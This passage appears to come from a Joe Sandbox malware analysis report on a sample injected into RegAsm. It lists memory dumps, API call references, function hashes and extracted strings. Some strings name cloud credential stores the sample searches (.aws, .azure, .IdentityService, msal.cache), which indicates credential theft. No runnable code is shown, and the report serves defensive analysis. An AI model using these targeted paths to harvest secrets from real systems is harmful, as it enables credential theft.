                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                              • API String ID: 2836893066-974132213
                                                                                                                                                                                                                                                              • Opcode ID: 9196b403b137c738579b3108a1551c267e6cb69ad4e8bf29b5987e1cf497b0e3
                                                                                                                                                                                                                                                              • Instruction ID: bbbb16994cd893d1d19cc7249d0d84fa93e21691c936d3973ee14e07f04d78ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9196b403b137c738579b3108a1551c267e6cb69ad4e8bf29b5987e1cf497b0e3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41A172D00218AADB00FBA1DC46EEE776CEF4C344F00456FB555A3182EA7C97588BA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                              • API String ID: 0-2933911573
                                                                                                                                                                                                                                                              • Opcode ID: 66982031768a430392fb939dfee6fca2e6b8a7f47905455b679e9bd10654d348
                                                                                                                                                                                                                                                              • Instruction ID: 7d163c8a298822ff83a47866fd97d380ac8840136914135efb73078c20bf5cca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66982031768a430392fb939dfee6fca2e6b8a7f47905455b679e9bd10654d348
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9A198769002415FD7018B3D9C81FAA7B9DAF45211F8D416DECCA9E182E62BA14FC7B2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 19842E5A
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19842E69
                                                                                                                                                                                                                                                              • SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 19842DA4
                                                                                                                                                                                                                                                              • invalid, xrefs: 19842E4E
                                                                                                                                                                                                                                                              • unopened, xrefs: 19842E55
                                                                                                                                                                                                                                                              • misuse, xrefs: 19842E73
                                                                                                                                                                                                                                                              • WHERE name=%Q, xrefs: 19842DB7
                                                                                                                                                                                                                                                              • NULL, xrefs: 19842E38
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 19842E78
                                                                                                                                                                                                                                                              • ORDER BY name, xrefs: 19842DCC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                                                                                                                                                                                                              • API String ID: 0-1179878930
                                                                                                                                                                                                                                                              • Opcode ID: 9291af94b18bef1b15aaa7fec0509df2cd0d83050ede330f8d82156192da4b2f
                                                                                                                                                                                                                                                              • Instruction ID: 8bfcdf138ef49d578248da959e388a7d71a747c1b5b1fc49de7c688b03a81b7e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9291af94b18bef1b15aaa7fec0509df2cd0d83050ede330f8d82156192da4b2f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67C1247190835C9BD710CF28CC45B5B77A4AF60344FAC852DEC599B282E735E98AC7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004086DF
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004088FB
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00408902
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00408A26
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423D9C), ref: 00408A34
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00408A46
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423DA0), ref: 00408A54
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00408B67
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00408B75
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408BCE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1592390033-0
                                                                                                                                                                                                                                                              • Opcode ID: 0e32acc3270a804976cc687eaf11467497462d9b8367ea082ee213fc57e41833
                                                                                                                                                                                                                                                              • Instruction ID: b033f1db96c4c2c7975a85d4d5340990d25991923da802ee933f36c6671bd85d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e32acc3270a804976cc687eaf11467497462d9b8367ea082ee213fc57e41833
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89F13A71800148EADF05EBA6DD46AEDBB75BF14308F14886EF442731D2EF782A19DB25
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                                                                                                                                                                                                                                              • API String ID: 0-3330941169
                                                                                                                                                                                                                                                              • Opcode ID: 278009c0e4b37fc4ccb04a1c2ed992099399bd7957eb8ea74779d240b62c3e13
                                                                                                                                                                                                                                                              • Instruction ID: 8c8631b7e3f8a97e4ce230f58b1d1634212f78a657608eec85c6ee23e05dacb5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 278009c0e4b37fc4ccb04a1c2ed992099399bd7957eb8ea74779d240b62c3e13
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 207139BAB003115BC6069A5AED0154F77D8EFC5212F2C087DF986C7251EB21E95AC7E3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00410693
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415572), ref: 004106B5
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004106C0
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 004106D7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitH_prologProcessstrtok_s
                                                                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                                                                              • API String ID: 3745986650-2199623458
                                                                                                                                                                                                                                                              • Opcode ID: 68afcdf46f8253918330cdb99f04ed3b87d8c35154cbae6e81da98b66b7883ea
                                                                                                                                                                                                                                                              • Instruction ID: 9b64ad6d5f196301b4d0c42fb4f5707bd1d9b9b974bd1dc61b790080033fc8d1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68afcdf46f8253918330cdb99f04ed3b87d8c35154cbae6e81da98b66b7883ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89418571A54311EBCB10BFB1AC45AEB37A8FA55745760483BF442E2250E6B8E5C08BA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                                                                                                                                                                                                                                              • API String ID: 0-1070437968
                                                                                                                                                                                                                                                              • Opcode ID: b7926691654572d5e4b0473803d7d0905c87fe1266f84c6c57d3f78b10c913d0
                                                                                                                                                                                                                                                              • Instruction ID: f4fca031cf749d35d5ce774e7098e4dc8778cd7f94225c3f8a8bf36cdaf10acb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7926691654572d5e4b0473803d7d0905c87fe1266f84c6c57d3f78b10c913d0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D02F1B19043459BD710CF28CC86B5B77E8BF5470AF8C452CE84997282E775E649CBE2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                                                                                                                                                                                                                                              • API String ID: 0-3900766660
                                                                                                                                                                                                                                                              • Opcode ID: 74655fc0a1ed967b3753cc41a32a7690d054a39bff9894e735cedc397867b43a
                                                                                                                                                                                                                                                              • Instruction ID: 46a6a420d3d769663334918dbf536815c5ca7bfa1b9e16833e3ac3e83dcb3ccb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74655fc0a1ed967b3753cc41a32a7690d054a39bff9894e735cedc397867b43a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DE104B89087419BD710CF28CC41B5B77E8BF94714F1C452CE8899B282E77BE849C7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                                                                                                                                                                                                                                              • API String ID: 0-1477268580
                                                                                                                                                                                                                                                              • Opcode ID: f903d615989857ae6be13a6bd7efd572a5e76320270beb7d6a51daa4dc02fdca
                                                                                                                                                                                                                                                              • Instruction ID: c1fd5361616cb2c5749335a9e6aa5ad83c2325989102c84d575c55823752e560
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f903d615989857ae6be13a6bd7efd572a5e76320270beb7d6a51daa4dc02fdca
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0851FDB46047059FD300CF28DC80A66B3A4FF95315F08892EE9568B752EB32E848CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
